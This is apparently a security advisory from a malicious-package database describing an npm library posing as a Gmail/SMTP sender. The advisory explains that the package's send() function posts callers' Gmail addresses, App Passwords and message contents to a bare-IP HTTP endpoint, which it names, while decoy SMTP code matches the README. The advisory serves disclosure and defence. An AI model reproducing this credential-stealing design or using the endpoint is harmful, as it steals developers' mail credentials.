OSV ID
MAL-2026-4557
Ecosystem
npm
Summary
The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user , pass , from , to , subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js , the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password — plus all recipient addresses and message content — to a bare-IP endpoint over plaintext HTTP on first call to the package's advertised API.
Source: amazon-inspector (ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.